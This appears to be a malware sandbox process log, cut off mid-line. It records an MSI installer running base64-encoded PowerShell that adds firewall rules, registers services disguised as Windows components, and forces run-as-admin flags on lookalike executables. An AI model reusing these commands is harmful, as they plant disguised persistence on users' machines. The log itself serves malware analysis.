LQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACIAIAAtAEcAcgBvAHUAcAAgACIAVwBpAG4AZABvAHcAcwAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwAgAFMAZQByAHYAaQBjAGUAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAIABTAGUAcgB2AGkAYwBlACAATQBhAG4AYQBnAGUAcgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAE8AdQB0AGIAbwB1AG4AZAAgAC0AUAByAG8AZgBpAGwAZQAgAEEAbgB5ACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgAKAE4AZQB3AC0ATgBlAHQARgBpAHIAZQB3AGEAbABsAFIAdQBsAGUAIAAtAE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBHAHIAbwB1AHAAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAiACAALQBQAHIAbwBnAHIAYQBtACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABBAG4AeQAgAC0AQQBjAHQAaQBvAG4AIABBAGwAbABvAHcAIAAtAEUAbgBhAGIAbABlAGQAIABUAHIAdQBlAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAVwBpAG4AZABvAHcAcwAgAE0AZQBkAGkAYQAgAFMAeQBuAGMAaAByAG8AbgBpAHoAYQB0AGkAbwBuACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFcAaQBuAGQAbwB3AHMAIABNAGUAZABpAGEAIABTAHkAbgBjAGgAcgBvAG4AaQB6AGEAdABpAG8AbgAgAFMAZQByAHYAaQBjAGUAIgAgAC0ARwByAG8AdQBwACAAIgBXAGkAbgBkAG8AdwBzACAATQBlAGQAaQBhACAAUwB5AG4AYwBoAHIAbwBuAGkAegBhAHQAaQBvAG4AIABTAGUAcgB2AGkAYwBlACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIAIAAtAEQAaQByAGUAYwB0AGkAbwBuACAATwB1AHQAYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAQQBuAHkAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQAKAAoATgBlAHcALQBOAGUAdABGAGkAcgBlAHcAYQBsAGwAUgB1AGwAZQAgAC0ATgBhAG0AZQAgACIAbQB5AHMAdABfAGwAYQB1AG4AYwBoAGUAcgBfAHQAYwBwACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIAbQB5AHMAdABfAGwAYQB1AG4AYwBoAGUAcgBfAHQAYwBwACIAIAAtAFAAcgBvAGcAcgBhAG0AIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXAAuAG0AeQBzAHQAZQByAGkAdQBtAC0AYgBpAG4AXABtAHkAcwB0AC4AZQB4AGUAIgAgAC0ARABpAHIAZQBjAHQAaQBvAG4AIABJAG4AYgBvAHUAbgBkACAALQBQAHIAbwBmAGkAbABlACAAUAB1AGIAbABpAGMAIAAtAFAAcgBvAHQAbwBjAG8AbAAgAFQAQwBQACAALQBBAGMAdABpAG8AbgAgAEEAbABsAG8AdwAgAC0ARQBuAGEAYgBsAGUAZAAgAFQAcgB1AGUACgBOAGUAdwAtAE4AZQB0AEYAaQByAGUAdwBhAGwAbABSAHUAbABlACAALQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdQBkAHAAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBtAHkAcwB0AF8AbABhAHUAbgBjAGgAZQByAF8AdQBkAHAAIgAgAC0AUAByAG8AZwByAGEAbQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAC4AbQB5AHMAdABlAHIAaQB1AG0ALQBiAGkAbgBcAG0AeQBzAHQALgBlAHgAZQAiACAALQBEAGkAcgBlAGMAdABpAG8AbgAgAEkAbgBiAG8AdQBuAGQAIAAtAFAAcgBvAGYAaQBsAGUAIABQAHUAYgBsAGkAYwAgAC0AUAByAG8AdABvAGMAbwBsACAAVQBEAFAAIAAtAEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAG4AYQBiAGwAZQBkACAAVAByAHUAZQA=
      4⤵
      PID:4280
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:3408
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss81E8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi81D5.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr81D6.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr81D7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:1124
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAFMAZQByAHYAaQBjAGUAIAAtAE4AYQBtAGUAIAAiAFAAcgBvAGcAcgBhAG0AcwBDAGEAYwBoAGUAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABDAGEAYwBoAGUAIABQAHIAbwBnAHIAYQBtACAAQwBvAG4AdAByAG8AbAAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIARABlAHYAQQBzAHMAbwBjAE0AYQBuACIAIAAtAEQAaQBzAHAAbABhAHkATgBhAG0AZQAgACIARABlAHYAaQBjAGUAIABBAHMAcwBvAGMAaQBhAHQAaQBvAG4AIABNAGEAbgBhAGcAZQByACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAEQAZQB2AGkAYwBlACAAQQBzAHMAbwBjAGkAYQB0AGkAbwBuACAATQBhAG4AYQBnAGUAcgAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIATgBnAGMAQwBwAG0AcgBTAHYAYwAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACIAIAAtAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAgACIATQBhAG4AYQBnAGUAcwAgAGEAbgBkACAAaQBtAHAAbABlAG0AZQBuAHQAcwAgAE0AaQBjAHIAbwBzAG8AZgB0ACAAQwByAGUAZABlAG4AdABpAGEAbABzACAAUABhAHMAcwBwAG8AcgB0ACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABpAG0AZQBSAGEAdABpAG8AUwB2AGMAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGkAbQBlACAAUgBhAHQAaQBvACAAUwBlAHIAdgBpAGMAZQAgAHUAcwBlAGQAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIABvAHQAaABlAHIAIABwAHUAcgBwAG8AcwBlAHMALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAcwB0AG8AcABwAGUAZAAsACAAcwBoAGEAZABvAHcAIABjAG8AcABpAGUAcwAgAHcAaQBsAGwAIABiAGUAIAB1AG4AYQB2AGEAaQBsAGEAYgBsAGUAIABmAG8AcgAgAGIAYQBjAGsAdQBwACAAYQBuAGQAIAB0AGgAZQAgAGIAYQBjAGsAdQBwACAAbQBhAHkAIABmAGEAaQBsAC4AIABJAGYAIAB0AGgAaQBzACAAcwBlAHIAdgBpAGMAZQAgAGkAcwAgAGQAaQBzAGEAYgBsAGUAZAAsACAAYQBuAHkAIABzAGUAcgB2AGkAYwBlAHMAIAB0AGgAYQB0ACAAZQB4AHAAbABpAGMAaQB0AGwAeQAgAGQAZQBwAGUAbgBkACAAbwBuACAAaQB0ACAAdwBpAGwAbAAgAGYAYQBpAGwAIAB0AG8AIABzAHQAYQByAHQALgAiACAALQBTAHQAYQByAHQAdQBwAFQAeQBwAGUAIAAiAEEAdQB0AG8AbQBhAHQAaQBjACIAIAAtAEIAaQBuAGEAcgB5AFAAYQB0AGgATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAKAAoATgBlAHcALQBTAGUAcgB2AGkAYwBlACAALQBOAGEAbQBlACAAIgBTAHAAbwBvAGwAZQByAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABpAHMAcABsAGEAeQBOAGEAbQBlACAAIgBTAHAAbwBvAGwAZQByACAAQQBkAHYAYQBuAGMAZQAgAEMAbwBuAHQAcgBvAGwAIgAgAC0ARABlAHMAYwByAGkAcAB0AGkAbwBuACAAIgBNAGEAbgBhAGcAZQBzACAAYQBuAGQAIABpAG0AcABsAGUAbQBlAG4AdABzACAAUwBwAG8AbwBsAGUAcgAgAFAAcgBvAGcAcgBhAG0AIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAbQBhAGsAZQAuAGUAeABlACIACgAKAE4AZQB3AC0AUwBlAHIAdgBpAGMAZQAgAC0ATgBhAG0AZQAgACIAVABlAGwAZQBtAGUAdAByAHkATQBnAG0AdAAiACAALQBEAGkAcwBwAGwAYQB5AE4AYQBtAGUAIAAiAFQAZQBsAGUAbQBlAHQAcgB5ACAATQBhAG4AYQBnAGUAcgAiACAALQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AIAAiAE0AYQBuAGEAZwBlAHMAIABhAG4AZAAgAGkAbQBwAGwAZQBtAGUAbgB0AHMAIABUAGUAbABlAG0AZQB0AHIAeQAgAE0AYQBuAGEAZwBlAHIAIABDAG8AbgB0AHIAbwBsACAAdQBzAGUAZAAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAG8AdABoAGUAcgAgAHAAdQByAHAAbwBzAGUAcwAuACAASQBmACAAdABoAGkAcwAgAHMAZQByAHYAaQBjAGUAIABpAHMAIABzAHQAbwBwAHAAZQBkACwAIABzAGgAYQBkAG8AdwAgAGMAbwBwAGkAZQBzACAAdwBpAGwAbAAgAGIAZQAgAHUAbgBhAHYAYQBpAGwAYQBiAGwAZQAgAGYAbwByACAAYgBhAGMAawB1AHAAIABhAG4AZAAgAHQAaABlACAAYgBhAGMAawB1AHAAIABtAGEAeQAgAGYAYQBpAGwALgAgAEkAZgAgAHQAaABpAHMAIABzAGUAcgB2AGkAYwBlACAAaQBzACAAZABpAHMAYQBiAGwAZQBkACwAIABhAG4AeQAgAHMAZQByAHYAaQBjAGUAcwAgAHQAaABhAHQAIABlAHgAcABsAGkAYwBpAHQAbAB5ACAAZABlAHAAZQBuAGQAIABvAG4AIABpAHQAIAB3AGkAbABsACAAZgBhAGkAbAAgAHQAbwAgAHMAdABhAHIAdAAuACIAIAAtAFMAdABhAHIAdAB1AHAAVAB5AHAAZQAgACIAQQB1AHQAbwBtAGEAdABpAGMAIgAgAC0AQgBpAG4AYQByAHkAUABhAHQAaABOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIA
      4⤵
      PID:1360
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:5856
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss83F0.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi83DE.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr83DF.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr83E0.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:5996
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAGQASQBsAGgAbwBzAHQALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABkAEkAbABoAG8AcwB0AC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATg